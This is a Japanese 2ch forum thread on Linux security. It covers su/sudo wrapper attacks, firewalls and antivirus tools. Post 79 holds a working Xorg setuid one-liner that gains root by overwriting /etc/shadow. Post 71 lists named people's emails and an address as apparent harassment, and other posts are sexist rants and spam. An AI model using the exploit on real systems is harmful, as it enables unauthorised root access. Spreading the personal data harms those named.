X



トップページLinux
323コメント139KB
Linuxセキュリティ総合スレ [無断転載禁止]©2ch.net
0001login:Penguin2016/06/12(日) 23:17:47.19ID:OMH3td/9
Linuxを安全に使うためにセキュリティについて語りましょう!
0002login:Penguin2016/06/12(日) 23:38:08.55ID:yP8FUEwn
インターネットに繋がない
0003login:Penguin2016/06/13(月) 06:09:27.32ID:eDU8tci1
電源を入れない
0004login:Penguin2016/06/13(月) 10:29:04.09ID:Oh9pGuME
気にしない
0005login:Penguin2016/06/13(月) 11:01:38.26ID:2M58TAyx
SAKOKU を使う
0006login:Penguin2016/06/13(月) 11:57:17.29ID:J1aqrsrp
勝つためには戦わないこと(´・ω・`)
0007login:Penguin2016/06/13(月) 12:21:18.30ID:8nJEuh/y
手始めにiptableから乗り換える話書けや
0008login:Penguin2016/06/13(月) 15:37:47.75ID:0TZsX1cx
セキュリティ総合ってことはウィルス対策もここでいいよね?
0009login:Penguin2016/06/13(月) 20:55:43.29ID:j5ciL7QT
そもそもLinux使うこと自体が対策に成り得る
0010login:Penguin2016/06/13(月) 22:05:23.35ID:Qr5Zi0oD
サイバーノーガード戦法だ
0011login:Penguin2016/06/13(月) 22:14:04.99ID:K9ELyhAn
nftの情報仕入れることを期待してたんだけど、セキュリティのスレなのな。
最近nftに移行はしたけど、iptableで指定した項目が全て移せたわけではないな〜。
0013login:Penguin2016/06/20(月) 09:45:44.94ID:EE0G5RY5
UACが欲しい(´・ω・`)
0014login:Penguin2016/06/27(月) 21:17:47.20ID:1MSZfZlD
代わりにキーリングをあげよう
0015login:Penguin2016/07/08(金) 22:16:34.93ID:nKTBpDXx
ぱんつくれ !
0016login:Penguin2016/07/11(月) 20:45:28.85ID:1UAhQw4h
(´・ω・`)・ω・`) キャー
/  つ⊂   \  怖いー
0017login:Penguin2016/07/16(土) 12:23:29.36ID:az2Lvjtg
make pan
0018login:Penguin2016/07/28(木) 14:39:09.27ID:vgMn1AfM
残念ながらいくつかの解決が困難な問題のせいで今やUnix/LinuxよりWindowsのほうが遥かにセキュアだからな。
被害が少ないのはただ単に狙われてないからってだけ。

1.su/sudoが糞
glibcの脆弱性GHOSTの発見に関わった人のコメント

http://www.openwall.com/lists/owl-users/2004/10/22/2
> If it would be permitted for a non-root user to su to root, then anyone who could have compromised the user's account[1] would also be able to hijack a su session[2] and then su to root himself.
> [1] Such a compromise could occur in a variety of ways: Web/FTP/etc.
> client vulnerabilities, password snooping, etc.
> [2] For example, edit the user's shell startup scripts to make su an alias for a custom su wrapper program.

http://www.openwall.com/lists/owl-users/2004/10/20/6
> unfortunately both su and sudo are subtly but fundamentally flawed.
> So the separation between the non-root and the root accounts is lost.


suやsudoを使える非rootのアカウントが攻撃者に侵入された時点で、攻撃者はそのアカウントの~/.bashrcなどにパスワードを盗むラッパーを実際のsu/sudoのaliasやfunctionとして仕込んだり出来る。
次に正規のユーザーがsu/sudoを使おうとすると攻撃者の仕込んだラッパーが実行され攻撃者はパスワードを得ることが出来、あとは攻撃者もsu/sudoを使い放題となる。
結果としてこれらのツールのせいでrootと非rootというユーザーの分離という一番基本的なセキュリティさえ無意味になっている。
0019login:Penguin2016/07/29(金) 08:18:56.26ID:3v5CyHDC
じゃけんSELinux使いましょうね
0020login:Penguin2016/07/29(金) 11:43:36.67ID:c3kWqYGY
セキュリティ対策がはっきりしない以上Win使いしかいない
でもw10こわいわー
0021login:Penguin2016/07/29(金) 12:00:07.41ID:r5rsVV/0
>>18
侵入された時点でおしまいだろうに何言ってんだこいつって感じですかね。
0022login:Penguin2016/07/29(金) 15:11:35.83ID:2cIkyZpH
>>21
今の時代は「侵入された時点でおしまい」が許されないからこそブラウザとかはseccompやnamespaceを駆使して仮に脆弱性経由で何かコードが実行されても被害を最小限に食い止めるようにsandbox化に力を入れてたりするんだが
そもそもそれが許されるなら、一人で使うデスクトップ用途ではUbuntuみたいなわざわざ「普段非rootでログインして必要な時だけsu/sudoでrootになって実行する」
っていう行動にはセキュリティ的には何の意味もない、最初からrootでログインしてそのままエロサイト巡りしても何ら問題ないって事になるのは理解できるか?


もっとも昔はそれでも問題ないレベルだったのでWindowsではAdministratorでのログインがデフォになってたわけだが
そのあたりをきちんと理解しないで「Unix/LinuxはWindowsよりセキュアなんですーー」で思考停止してる馬鹿が大多数のせいで今の現状があるわけだ

その間にWindowsは、UACのように権限を得るためにはきちんとそれぞれへの入出力の機密性やコマンド自身の完全性をきちんと確保して「異アカウント間の分離」を破壊しないように考慮したり、
ILのように同アカウント内でもきちんとプロセス間を分離して保護(これは>>19の言うように強制アクセス制御で"一部"は解決できる)することでよりセキュアに進化した

一方残念ながら思考停止したUnix/Linuxは、権限を得るために「何の保護もない環境」から実行される「何の保護もされてないsu/sudoコマンド」に対して「何の保護もされてない状態でパスワードを入力する事」状態が放置され、
その一番基本的な「異アカウント間の分離」すら無意味になってる体たらく
結果的に「(sudoが使える非rootユーザーが)侵入された時点で(システム全体が)おしまい」になってるので、一周回ってお前の言ってることも正解なわけだがな
0023login:Penguin2016/07/29(金) 15:40:50.53ID:2cIkyZpH
一応フォローしとくとLinux kernel自体は割ときちんと進化してるな、NXとかASLRとかYamaとかLSMとか

きちんと設定されてなかったり(互換性のせいで出来ない)、ユーザーランドが糞の寄せ集めなせいで台無しだが
0024login:Penguin2016/07/29(金) 16:57:07.30ID:AresjTJd
うんそれはご説ごもっともなんだけどさ、ただ危ないぞって騒ぐだけじゃなくて被害に遭った卑近な例とか挙げられないのかな?
卑近なって言ってもあなたの身近な人じゃなくてネットで皆の目に触れるようなブログやフォーラムでいいんだ。
xpが終わる時にデスクトップLinuxがって騒いでから、Linuxといえどのほほんとしてられないってのはみんな思ってることなんだ。
だから知りたいのは、いかに危険か、ではなく、危険なブツに出くわした時にどうすべきか、出くわした人はどう対処したか、なんだよ。
開発に携わった人のブログやコラム見つけて危険だ危険だって焚き付けるのなんて思考停止してもできることだろ?
LinuxユーザーがWindowsは危険だと騒ぐのが思考停止ならWindowsユーザーがLinuxは危険だと騒ぐのもまた思考停止じゃないの?対策を示すとか何かしない限り。
まるで、ゲームのバグを見つけたからプランナーや開発者より自分の方が優秀だって威張ってるデバッガーみたいだよ君は。
0025login:Penguin2016/07/29(金) 17:23:02.18ID:2cIkyZpH
>>24
俺みたいなゴミクズには解決する力も政治力もないから2chみたいな掃き溜めでグチってんのよ
Linux好きだから改善してほしいし、もし同じように問題だと感じる人が増えてくれれば改善される可能性も増すしね

そのために敢えて居丈高にLinuxに厳しくWindowsに甘く書いたんだ、ゴメン(´・ω・`)
0026login:Penguin2016/07/29(金) 17:53:59.24ID:53ApPnD4
windowsが仮に安全つうのは
あることするには続きは窓操作も必要だからじゃね?(あるいは暗号のようなパス書かないと辿れないとか)
そういう不便さを有難くセキュリティーが強いというのかどうか
0027login:Penguin2016/07/29(金) 19:36:23.87ID:IWyIiLvv
Windowsがセキュリティーを確保しているのは専業のベンダー各社が競争に晒されながら製品を開発しているからであって、Windows自身が特段セキュリティに優れる訳じゃない
0028login:Penguin2016/07/29(金) 21:02:48.88ID:2cIkyZpH
https://blog.martin-graesslin.com/blog/2015/11/looking-at-the-security-of-plasmawayland/
KDEの開発の人とかちゃんといまのXやシェルとかの実行環境には問題があることを認めてどうしたら良いか考えてる人もいるんだよなー
でも自分の開発してるソフトウェアだけが対応してもshellとかの他のソフトウェアのせいでそれが無意味になっちゃったりで困ってる
0029login:Penguin2016/07/30(土) 13:47:31.26ID:m4BHHueF
強制アクセス制御だけでハッキングを防御できるの?できないの?
それと、強制アクセス制御のステータスってのは何らかのファイルにロギングされんの?
0030login:Penguin2016/07/30(土) 13:54:08.97ID:m4BHHueF
Linuxなんてのは宮大工が構築した接ぎ木細工のようなもの。
ノーガードきめこんで運用してたら、そりゃあ狙われた時に簡単にクラッシュしますがな。
(肝心な釘打ち無しで構築してるもんだから)
Windowsの世界ではねセキュリティソフト入れて丸投げしてるわけ。
但し、ユーザーの中には変わり者がいて、ノーガードな奴もいる訳、
まあ、他人ごとでどうなろうが知ったことじゃないが…
0032login:Penguin2016/08/13(土) 04:51:41.40ID:aN9vHd6i
>>31
すぐ更新されるから慌てなさんな
0033login:Penguin2016/08/13(土) 08:48:05.17ID:TXBKXjH8
>>32
2012年からあった脆弱性がすぐに修正されるの?
0034login:Penguin2016/08/13(土) 08:55:27.99ID:1K0xoI1z
すでにパッチは出ているぞい
0035login:Penguin2016/08/13(土) 11:19:12.09ID:UrcrvCqb
大して重要じゃないと思われてたから放置されてただけで、
修正が難しいわけじゃないのだろう。
0036login:Penguin2016/08/14(日) 13:17:03.39ID:gduCaAAf
「誰も気づかなかったけど2012年からひっそり存在していた物が今発見されてすぐに修正された」
だろ
0037login:Penguin2016/08/14(日) 14:21:25.00ID:IM019vfG
日本の官公庁のサーバのセキュリティってまともなの?
0038login:Penguin2016/08/14(日) 18:52:10.23ID:fe3iWrgq
>>37
自分で確認したら?ガバガバだから。ただし、法令違反で引っ張られないように工夫しろよ。
官公庁はWindows serverじゃないの?
0039login:Penguin2016/09/03(土) 02:42:39.64ID:T3i7Gd65
アグレックスって その13

なんで飲み行かないの?
なんで女の子誘って飲みに行かないの?
声掛けないと飲みいけないのに。
話しないと恋は始まらないよ。
声掛けないとSEXもさせてくれないのに。
声掛けないから、
ヤンキーみたいなオジサンが誘いだして大きなこと言って、不倫してるよ。
女の子誘って飲みにきなよ。
女の子に声掛けないと、恋も出来ないよ。
SEXしたかったら、声掛けて飲みに行きなよ。
残業してる間に、持っていかれちゃってるよ。
後ろから見たら、がに股になってる女の子見たことない?
SEXしたかったら、なんでもいいから声掛けて飲みに行きなよ。
残業しても恋はできないよ。SEXできないよ。
恋をしなけりゃ、SEXはさせてもらえない。
恋をするには、話して気に入ってもらうしかない。
気に入ってもらうには、飲み行くのが近道だろ。
別に会議で、大きな事言ってもいいけど。
どうせSEX出来るまで何度も繰り返すんだろうから、
そのうち年配の方々にめんどくさがられて、遠くに飛ばされるよ。
そんなだったら、飲みに行くのが一番だろ。
別にがに股のさせこちゃんを探して、お願いしてみてもいいけど。
ばれたとき、周りの目が厳しいぞ。

お前が呼ばないから、ほらみろ可愛い子はみんなやられて。
  残っているのはブスばかりになってるじゃないか。
  ブスはキツイぞ。

誘えないなら、韓国人でも買えよ。みんなそうしてるぞ。
0040login:Penguin2016/09/06(火) 16:46:15.64ID:vVf8gi4f
clamAVでは不安だお(´・ω・`)
0041login:Penguin2016/09/06(火) 22:53:44.42ID:TopTMWtn
>>40
なんでよ?シスコ様だぞ?
0042login:Penguin2016/09/07(水) 07:09:59.88ID:O110MSh/
常駐じゃないと安心できないマン
0043login:Penguin2016/09/13(火) 10:37:58.85ID:g0CBlyhH
常駐か駐留か進駐か それが問題である
0044login:Penguin2016/09/17(土) 18:12:13.92ID:9GLGaOH4
ギブミーチョコレート
0045login:Penguin2016/09/29(木) 12:32:01.60ID:ZwQJlT8x
尻|ω゚ )┻┛身動きとれんのだが・・・
0046login:Penguin2016/09/29(木) 12:44:59.58ID:5wiRFmuo
NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""
0047login:Penguin2016/09/29(木) 12:54:29.04ID:lvJNOdKb
最強のiptablesの設定をうぷしてくれる神いないの?
0048login:Penguin2016/09/29(木) 20:57:19.24ID:SWTYFo2r
firewalldに乗り換えれ
0049login:Penguin2016/10/04(火) 17:05:57.73ID:ZgAPWl/3
>>48
乗り換えると最強になるの?
0050login:Penguin2016/10/04(火) 21:10:03.74ID:MfnjwfuN
設定が簡単になるから、「設定をうぷしてくれ」とは思わなくなる
0051login:Penguin2016/10/23(日) 10:01:10.29ID:PWQ2IPcX
>>50
出て行く通信のフィルタを書くためには
結局IPTABLES書かなきゃいけないのはなおった?
なおったなら乗り換える。
0052login:Penguin2016/11/30(水) 12:37:43.41ID:SfHGIzEu
   ∧,,,∧
   (´・ω・) < おっかのうえひっなげしのはぁながぁぁ 〜
   (U   )
   `u-u´
0053login:Penguin2017/01/20(金) 17:47:06.69ID:OITYnSWZ
      ___
      (\ ∞ ノ  
      ヽ)_ノ  迫る〜パンチ〜〜♪
      (=O┬O
    ◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
0054login:Penguin2017/02/01(水) 08:09:39.67ID:gwo76No6
     .γ ⌒ ヾ 
     (´・ω・`)  迫る〜ハゲッ♪ 
      (=O┬O
    ◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
0055login:Penguin2017/02/13(月) 20:59:43.28ID:aKHZLuDZ
顔がでかいなぁ・・・
0056login:Penguin2017/03/08(水) 21:47:52.30ID:TuQ4x/Y7
       ∧_∧
      .ミ,,・_・ミ   迫る〜ハゲッ♪ 
      (=O┬O
    ◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
0057login:Penguin2017/04/19(水) 13:43:38.91ID:kexeXY6M
(´・ω・´・ω・ω・`)知らんがなトリオ
0058login:Penguin2017/04/28(金) 16:59:33.55ID:ZiXyj8JT
Linuxの方がWindowsよりもセキュアだっていうのは
過去の話なんすね。それなのに未だにLinuxを
安全って紹介してる所ばかりなのは何でですかね
0059login:Penguin2017/04/30(日) 00:21:15.39ID:zhwkJ+1u
Linuxで被害出たという報告は少ないでしょ
Windowsでは散々あるけど
0060login:Penguin2017/04/30(日) 00:36:51.26ID:3yi8UZQK
使う奴のスキル/知識レベル次第だから、OSが解決できる問題じゃないよ
0061login:Penguin2017/04/30(日) 14:38:15.54ID:6nvs6+SR
んだんだ !
0062login:Penguin2017/04/30(日) 19:21:48.33ID:K1kIRV9a
clamとかselinuxとか、皆さん使っていますか?

マシンの使用用途によりけりだとは思いますが、
僕の自宅鯖はfail2banだけです。
有用な物や便利な物があれば教えて欲しいです。
0063login:Penguin2017/05/09(火) 10:29:04.72ID:6kIUOBHa
他人のサーバ管理してるけど、
今までosの脆弱性突かれてどうこうてのは
無いなあ

過去10年起きたのは、全てユーザーの問題
クソみたいなパスワード突破されたとか、
ゴミみたいなコードからのインジェクションとかのみ
0064login:Penguin2017/06/16(金) 09:15:27.82ID:Cv6QgGNP
今年も夏を乗りきれず逝く小型PCがいるのでしょうね
0065login:Penguin2017/06/16(金) 09:16:10.27ID:Cv6QgGNP
誤爆失礼
0066login:Penguin2017/07/03(月) 23:36:13.34ID:cDHqg+NI
openssl enc -e -aes256
で暗号化してたファイルが、急に、
openssl enc -d 〜
で開けなくなりました。

ファイルが壊れたかとめちゃくちゃ焦ったけど、
タイムスタンプは去年のまま変化なし。
本家から、1.0.2lを落としてコンパイルした実行ファイルからだと
問題なく開けたからファイルの問題ではない模様。
1.1.0のバグですか?
#確か2ヶ月前ぐらいだとパッケージインストールされている
1.1.0系でも問題なかったはずですが。

linux-mint(ubuntu16.04)です。
0069login:Penguin2017/09/07(木) 19:37:24.22ID:NhVQ+S22
すまん誰か教えてくれ!

全くセキュリティーパッチを充てていないrhel6.1で、poodle対策をしなきゃいけないんだが、
設定変更だけで対処する場合は、ssl.confのcipherのところに -sslv3入れるだけで良い?
0070login:Penguin2017/10/16(月) 19:17:31.78ID:AvEU8VfP
           。o0○( zzzz… )
        _,,..,,,,_
       / ,' 3/⌒ヽ-、_   
     /l.  /____/
      ̄ ̄ ̄ ̄ ̄ ̄ ̄   
0071login:Penguin2017/11/03(金) 21:09:20.77ID:UMEHXcXh
【 日立製作所 】焦土戦

セキュリティの基本は尖らないこと、目立たないこと。隠すこと。 バカ。

新名主 隆志 TIS shimmyozu.takashi@technopro.com
色田 眞吾 日立製作所 Shikita.Shingo@technopro.com
八木 一暢 TIS yagi.kazunobu@technopro.com
水野 潤 ハマゴムエイコム Mizuno.Jun@technopro.com
佐々木 優也 (首都圏第1支店案件) sasaki.yuya@technopro.com
佐々木 健太 日立製作所 sasaki.kenta@technopro.com
中野 洋行 NSSLCサービス Nakano.Hiroyuki@technopro.com
永井 真祐子 富士ソフト nagai.mayuko@technopro.com
品川区高輪3-25-33
都内のトイレに花子さんだ
日立の末端は、ただの派遣会社だからな。メーカーはどこも一緒か。。
0072login:Penguin2017/12/29(金) 13:14:18.48ID:S/CsVkMC
誰でも簡単にパソコン1台で稼げる方法など
参考までに、
⇒ 『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。

グーグル検索⇒『宮本のゴウリエセレレ』

HRT6GIPYTB
0073login:Penguin2018/04/11(水) 07:03:34.17ID:9VtMkuZE
           。o0○( zzzz… )
        _,,..,,,,_
       / ,' 3/⌒ヽ-、_   
     /l.  /____/
      ̄ ̄ ̄ ̄ ̄ ̄ ̄  
0074login:Penguin2018/05/22(火) 11:10:27.97ID:Czl6p0FW
僕の知り合いの知り合いができた副業情報ドットコム
関心がある人だけ見てください。
グーグルで検索するといいかも『ネットで稼ぐ方法 モニアレフヌノ』

BTBIK
0076login:Penguin2018/05/26(土) 12:43:59.58ID:H0+abEbN
大問題じゃないか
0077login:Penguin2018/05/27(日) 16:31:34.31ID:QzfBv+yQ
Windowsのセキュリティにはうるさい犬厨もそっ閉じ。つまり、犬問題w
0078login:Penguin2018/07/08(日) 20:50:42.96ID:QTYf4jMn
           。o0○( zzzz… )
        _,,..,,,,_
       / ,' 3/⌒ヽ-、_   
     /l.  /____/
      ̄ ̄ ̄ ̄ ̄ ̄ ̄
0079login:Penguin2018/10/31(水) 11:46:41.86ID:XLo7vX23
suid付きXorgを使ったroot昇格法
https://www.exploit-db.com/exploits/45697/
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
xorgはフォントパスのリストをそのままログに書き込むことを利用してる
(shadowが上書きされるので試すならshadowのバックアップを取ってからどうぞ)
0080login:Penguin2019/03/10(日) 12:39:41.95ID:BHkfBLF0
            i"\ ))
            | 8  )
           ∧,,,∧∩-''"
      _ ..(´・ω・`)彡  おぱんつ おぱんつ ! !
   〃(\ ∞ ,⊂彡
     `ヽ)_ノ|   | 
          し⌒J
0081login:Penguin2019/05/24(金) 01:31:09.68ID:WQ5DwMzT
  彡⌒ ミ
  ( ´ ・ω・) 呼んだ ?
0082login:Penguin2019/05/31(金) 12:30:43.06ID:bdQbsGXY
Linuxを狙うマルウェア「HiddenWasp」に注意 2019/05/31 06:55 後藤大地
https://news.mynavi.jp/article/20190531-833791/

Intezerは5月19日(米国時間)、Linuxシステムを標的とした新しいマルウェア「HiddenWasp」を
発見したと「Intezer - HiddenWasp Malware Stings Targeted Linux Systems」で伝えた。

このマルウェアは現在も活動を継続しており、主要なアンチウィルスシステムで検出することが
できないと指摘されている。発見されたHiddenWaspの主な特徴は以下の通り。

・Linuxマルウェアの多くは仮想通貨マイニングやDDoS攻撃に焦点を当てているが、HiddenWasp
は異なっている。HiddenWaspはトロイの木馬として設計されており、標的のシステムを純粋に
リモートコントロールするために開発されている
・HiddenWaspに感染しているユーザーはすでに標的型攻撃のターゲットになっている可能性が
高い
・HiddenWaspはMiraiやAzazelルートキットといった入手可能なオープンソース・マルウェア
から大量のソースコードが流用されている
・HiddenWaspは中国のマルウェアファミリーに強い類似性があるものの、帰属に関しては可能
性が低いと見られる

Intezerは、Linuxを標的としたマルウェアは時間の経過とともにますます複雑になり続けている
と指摘。現在、一般的な脅威でも検出率があまり高くないが、より高度な脅威はさらに検出率が
低いという。今後、Linuxを標的としたマルウェアはさらに検出が難しくなるおそれがあり、
注意が必要。
0083login:Penguin2019/06/01(土) 00:37:42.11ID:/N3jDoCj
>>82
これはひどい

俺が唯一Linuxに移行できない理由がアンチウイルスソフトだからな
Windowsのノートンみたいに完璧なのがあれば、ノートン一つで完全に防げるけど、
Linuxにはこれがないからな

SophosAntiVirusがあるが、なぜか定義ファイルの更新が20日異常ないぞ(気のせい?)
RKHunter、Tripwire、Lynis、Firewallとかだけとかありえんだろ?
0084login:Penguin2019/06/01(土) 03:51:20.70ID:BeN0lDY7
Linuxだから安全です。
0085login:Penguin2019/06/01(土) 08:23:33.96ID:0WGBvA8D
ウィルス検体を各所に送り対応が早いとこは半日だったが
ノートンは3日後だったことがあった
0086login:Penguin2019/06/01(土) 23:05:01.15ID:aQmSSgBv
>>83
毎日更新してるんじゃないかな

ノートンやトレンドマイクロが対応してない最新のウィルスを先んじて検出したことがあったし、古い日付になってる定義ファイルはベースとなるやつの日付だと思ってる。
0087832019/06/02(日) 01:29:08.34ID:Zexh2AIq
$ sudo /opt/sophos-av/bin/savupdate
次のバージョンをアップデート中です - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
Updating Sophos Anti-Virus....
Updating SAVScan on-demand scanner
Updating Virus Engine and Data
Updating Manifest
Update completed.
次のバージョンにアップデートしました - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
sdds:SOPHOS からの Sophos Anti-Virus のアップデートに成功しました


$ sudo /opt/sophos-av/bin/savdstatus --version
Copyright 1989-2018 Sophos Limited. All rights reserved.
Sophos Anti-Virus = 9.15.1
ビルドのリビジョン = 2793374
脅威検出エンジン = 3.74.2
脅威データ = 5.63
検出脅威数 = 35620036
脅威データリリース日 = 2019年05月07日 00時00分00秒
前回アップデートを確認した日時 = 2019年06月02日 01時01分28秒


と脅威データリリース日がずっと5/7のままなんだよね
これでも最悪1日毎には更新してるのかね?
ノートンだと1時間に1回は更新してるっぽいけど
更新しててくれてると助かるのだが
0088832019/06/02(日) 01:30:11.25ID:Zexh2AIq
>>85-86へね
0089832019/06/03(月) 00:52:09.01ID:LINEVdyy
>>85-86
ここ見たらやはり1日1回ぐらいは更新されてそう
実際俺のSophosは普通に6/2更新されてた

どうも"脅威データリリース日 = 2019年05月07日 00時00分00秒"と
ウイルス定義ファイル更新日は違うらしい

ウイルス定義ファイル更新日もちゃんと書けよ>Sophos


Sophos Anti-Virus: ウイルス定義ファイル (IDE ファイル) が最新の状態にアップデートされているかどうかを確認する方法
https://community.sophos.com/kb/ja-jp/121984
0090login:Penguin2019/06/03(月) 02:02:29.21ID:jJq3PPoG
野良アプリをたくさん入れるWindowsではウイルス検知ソフトが不可欠だね。
0091login:Penguin2019/06/03(月) 02:06:37.36ID:jJq3PPoG
しかし、経験上、ウイルス検知ソフトはそれほど当てにできない。
世に知れ渡っていないウイルスが仕込まれていた場合に
ウイルス検知ソフトがそれを正しく検出してくれることはまれ。
何ヶ月か何年かあとになって改めてチェックしてみると検出される場合がある。
でもダウンロードあと、そこまで待ってインストールする人はいない。
0093login:Penguin2019/06/03(月) 22:51:46.35ID:sgwkICkl
>>82
これは具体的にどう注意したらいいんだ?
0094832019/06/03(月) 22:56:08.11ID:LINEVdyy
やはり、Sophosのウイルス定義ファイル更新は1日1回はあるな
↓となってるから(途中に更新あったかは知らんが多分ないだろ)

昨日
<published>2019-06-02T13:03:35</published>
今日
<published>2019-06-03T13:07:34</published>
0095login:Penguin2019/06/04(火) 11:45:07.22ID:JnEdCGFR
ソフォス個人情報入れないとダウン出来ないの?
0096832019/06/04(火) 23:57:45.16ID:8eAlB9kG
>>95
全部、適当に入れればいいよ
メアドは@と.orgとか.comは入れないとだめだけど、これも適当で大丈夫
0097login:Penguin2019/06/05(水) 09:35:56.10ID:2u//H+UO
電話番号とか住所も?
0098login:Penguin2019/06/05(水) 21:45:09.38ID:1PL8mpQb
電話番号、住所って書く欄あったっけ?
あったとしても、100%適当で通るよ
役職・法人名も適当でおk

国、県、郵便番号は日本、東京、1000000でおk

ちなみにLinux版はこれね
https://secure2.sophos.com/ja-jp/products/free-tools/sophos-antivirus-for-linux/download.aspx
https://www.sophos.com/ja-jp/products/free-tools/sophos-antivirus-for-linux.aspx

ここからいって普通に全部適当に入力しおわったら、自動でダウンロード始まるよ
0099login:Penguin2019/06/06(木) 13:34:15.13ID:Vt0/9sNy
>>98
都道府県がなぜか受け付けてくれない
0100login:Penguin2019/06/06(木) 20:22:08.58ID:yFuR+pcY
>>99
先に国名で「日本」選んだら都道府県欄に▲▼が出て、普通にマウスクリックで「Tokyo」が選べるようになるでしょ

国名: 日本
都道府県:Tokyo
郵便番号:100-0000

で大丈夫だよ
レスを投稿する


ニューススポーツなんでも実況